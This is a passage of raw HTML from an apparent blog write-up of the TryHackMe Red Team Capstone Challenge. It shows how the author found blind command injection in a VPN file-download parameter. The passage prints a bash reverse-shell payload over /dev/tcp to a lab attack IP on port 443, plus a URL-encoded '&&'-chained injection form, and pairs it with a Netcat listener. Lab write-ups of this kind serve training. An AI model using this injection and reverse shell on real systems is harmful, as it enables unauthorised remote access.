data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?fit=1024%2C182&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=1024%2C182&#038;ssl=1\" alt=\"\" class=\"wp-image-471\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=1024%2C182&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=300%2C53&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?resize=768%2C136&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206114943.png?w=1251&amp;ssl=1 1251w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09108eb1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09108eb1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"289\" data-attachment-id=\"472\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206115138\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?fit=1699%2C480&amp;ssl=1\" data-orig-size=\"1699,480\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206115138\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?fit=1024%2C289&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1024%2C289&#038;ssl=1\" alt=\"\" class=\"wp-image-472\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1024%2C289&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=300%2C85&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=768%2C217&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?resize=1536%2C434&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206115138.png?w=1699&amp;ssl=1 1699w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"21-foothold-on-vpn-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Foothold on VPN Machine<\/mark><\/h4>\n\n\n\n<p>To understand how the web server is downloading the files from the back end, we can try to capture the requets using <code>BurpSuite<\/code> and analyze the responses.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091094a2&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091094a2\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"569\" data-attachment-id=\"474\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142202\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?fit=1844%2C1024&amp;ssl=1\" data-orig-size=\"1844,1024\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142202\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?fit=1024%2C569&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1024%2C569&#038;ssl=1\" alt=\"\" class=\"wp-image-474\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1024%2C569&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=300%2C167&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=768%2C426&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?resize=1536%2C853&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142202.png?w=1844&amp;ssl=1 1844w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Looking at the response, it seems like the server appends the .ovpn extension to anything we search for. Carrying out a Path\/Directory Traversal attack might not be the best option for us here.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09109aa1&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09109aa1\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"402\" data-attachment-id=\"475\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142350\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?fit=1257%2C493&amp;ssl=1\" data-orig-size=\"1257,493\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142350\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?fit=1024%2C402&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=1024%2C402&#038;ssl=1\" alt=\"\" class=\"wp-image-475\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=1024%2C402&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=300%2C118&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?resize=768%2C301&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142350.png?w=1257&amp;ssl=1 1257w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The Server does the same when we try to inject a command  such as <code>id<\/code> or <code>whoami<\/code> into the <code>filename<\/code> parameter. After trying out different command injection techniques, we found out that it is vulnerable to blind <code>Command Injection<\/code>. By running the <code>sleep<\/code> command, the server waits for the number of seconds we specify before sending us the response.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910a1aa&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910a1aa\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" data-attachment-id=\"477\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142908\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?fit=1654%2C957&amp;ssl=1\" data-orig-size=\"1654,957\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142908\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?fit=1024%2C592&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1024%2C592&#038;ssl=1\" alt=\"\" class=\"wp-image-477\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1024%2C592&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=300%2C174&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=768%2C444&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?resize=1536%2C889&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142908.png?w=1654&amp;ssl=1 1654w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910a96e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910a96e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"597\" data-attachment-id=\"476\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206142824\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?fit=1647%2C960&amp;ssl=1\" data-orig-size=\"1647,960\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206142824\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?fit=1024%2C597&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1024%2C597&#038;ssl=1\" alt=\"\" class=\"wp-image-476\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1024%2C597&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=300%2C175&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=768%2C448&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?resize=1536%2C895&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206142824.png?w=1647&amp;ssl=1 1647w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>With confidence that it is vulnerable to command injection, we can send a reverse shell payload and try to catch a shell on our attack machine.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"bash -i &gt;&amp; \/dev\/tcp\/10.50.110.229\/443 0&gt;&amp;1\n\n# URL encoded\n%26%26+bash+-i+&gt;%26+\/dev\/tcp\/10.50.110.229\/443+0&gt;%261\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">bash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-i<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&gt;&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/dev\/tcp\/10.50.110.229\/443<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">0&gt;&amp;1<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #464B5D; font-style: italic\"># URL encoded<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">%26%26+bash+-i+&gt;%26+\/dev\/tcp\/10.50.110.229\/443+0&gt;%261<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will send the above payload and start a <code>Netcat<\/code> listener to catch the shell.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910b353&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910b353\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"246\" data-attachment-id=\"478\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206143204\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?fit=1943%2C466&amp;ssl=1\" data-orig-size=\"1943,466\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206143204\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?fit=1024%2C246&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1024%2C246&#038;ssl=1\" alt=\"\" class=\"wp-image-478\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=1024%2C246&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=300%2C72&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206143204.png?resize=768%2C184&amp;ssl=1 